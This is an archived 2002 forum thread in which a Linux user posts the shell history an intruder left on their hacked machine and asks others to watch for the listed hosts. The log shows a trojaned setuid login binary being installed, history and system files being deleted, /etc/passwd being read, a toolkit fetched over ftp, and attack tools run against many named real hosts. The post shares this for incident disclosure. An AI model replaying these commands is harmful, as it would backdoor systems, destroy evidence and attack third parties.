It is currently Mon, 18 Mar 2024 20:30:16 GMT



 
Author Message
 I got hacked and the hacker left this trace.

Dear all,

Of all things, my Linux box using a modem got hacked/trojaned.
The intruder left this in the .bash_history and please check if you
got it too. There are many site that are attempted with something
as shown.

Please forward/check with the admin guys if you are familiar with
the domain and/or IP addresses.
----------------
TERM=vt100
pico
gcc -o login bj.c
chown root:bin login
chmod 4555 login
chmod u-w login
cp /bin/login /usr/bin/xstat
cp /bin/login /usr/bin/old
rm /bin/login
chmod 555 /usr/bin/xstat
chgrp bin /usr/bin/xstat
mv login /bin/login
rm bj.c
rm /usr/sbin/rpc.mountd
ps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/portmap ; rm /tmp/h
; r
m /usr/sbin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bash_history
rm /home/kargay
rm /home/kargay/.bash_history
cd /home/kargay
ls
rm -rf *
ls
cat /etc/passwd
cat /etc/hosts
cd .s/dsc
ls
cd .s
ls
./k 202.30.12.244
./k 202.30.48.72
./k 202.30.48.244
./k 202.30.93.154
./k 202.30.93.150
./k 203.230.221.37
cd .s
./d bncchile.cl
TERM=vt100
telnet bncchile.cll
telnet bncchile.cl
exit
mkdir .s
cd .s
ftp mail.bankduta.co.id
unzip linux.zip
chmod +x amdex
mv amdex k
chmod +x mountd
mv mountd d
./d athena.directnet.com.au
./d 202.61.237.123
./d 202.61.252.249
./d alcala.Math.Uni-Augsburg.DE
./d kant.Physik.Uni-Augsburg.DE
./d sozgeo3.Geo.Uni-Augsburg.DE
./d ranabib.rana.fylkesbibl.no
./d 128.39.153.88
./d nisse.gtf.ol.no
./k 212.47.198.113
./d ns1.software602.cz
./d koleje.inplus.cz
./d 212.47.13.197
./d 212.47.13.194
./d 212.47.13.202
./d 212.47.13.209
./d mail.sasbrno.cz
./k 63.198.12.20
cd .s
./k 131.125.74.2
./k 139.62.37.23
./d math-31623.coas.unf.edu
./d 202.61.252.249
./d blue7.mps.ohio-state.edu
./d sycamore.mps.ohio-state.edu
./d amy.mps.ohio-state.edu
./k 171.64.18.167
./d anya.Stanford.EDU
./d netops-9.Stanford.EDU
./d sul-hw-drobinson.Stanford.EDU
./k 209.8.2.235
./d 209.8.0.66
telnet localhost 274444
telnet localhost 27444
./k 134.7.1.50
./k 134.7.1.50
./k 134.7.1.85
./k 134.7.1.168
./k 134.7.2.200
./k 134.7.5.255
./k 134.7.5.254
./d 194.163.27.195
./k 195.224.16.14
cd .s
./k 165.230.67.132
./d rutadmin-smtp.rutgers.edu
./d rcrs-aquatics-scuba.rutgers.edu
./d aquatics.rutgers.edu
ls
ls
ls
cd .s
./d igpp2153.ucr.edu
./k 138.23.168.24
./k 138.23.168.40
./k 194.163.34.119
./k 194.163.86.132
./d woodpecker.poptel.org.uk
./d shirehorse.equiworld.com
./d ns0.jupiter.net.uk
./d news.jupiter.net.uk
./d metis.jupiter.net.uk
./d www.whitgift.croydon.sch.uk
./d oaktree.jupiter.net.uk
./d www.delta-anglia.co.uk
./d sflovers.rutgers.edu
./d scilsnet2-211.rutgers.edu
./d 202.155.4.252
./d 202.155.9.250
exit
cd .s
./k 128.211.161.83
./k 128.211.161.119
./k 128.211.226.122
./k 128.211.236.49
./k 131.170.195.19
dig @linux.quicksilver.org version.bind chaos txt
./d ocelot.lib.rmit.EDU.AU
./d euler.ls.rmit.edu.au
./d liberator.art.rmit.edu.au
./d pc37.et.rmit.edu.au
./d blackadder.cse.rmit.edu.au



 Fri, 02 Aug 2002 03:00:00 GMT   
 I got hacked and the hacker left this trace.
sorry I don't know any those ip addresses (their not mine =)  But I'm
glad you are keeping a close watch on your system.  You must have a
minimum # of users, because my general theory that seems to match with
administrators' attitudes is: as user# go up, attention to detail goes
down.

Good job, sorry I couldn't help,
Jeff



 Fri, 02 Aug 2002 03:00:00 GMT   
 
   [ 2 post ] 

Similar Threads

1. The hackers left muddy foot prints!

2. The Hacker left a trail

3. The hackers left muddy foot prints!

4. Apache hacked - Hackers put mails via invalid URL

5. hacker hack me??

6. HELP NEWBIE: Mouse Cursor leaves a trace

7. Curses always leaves a "trace" file

8. Automatic reboots: Leaves no trace?

9. Getting traffic rate traces bound to each active tcp link

10. Getting stack trace from a core file


 
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group.
Designed by ST Software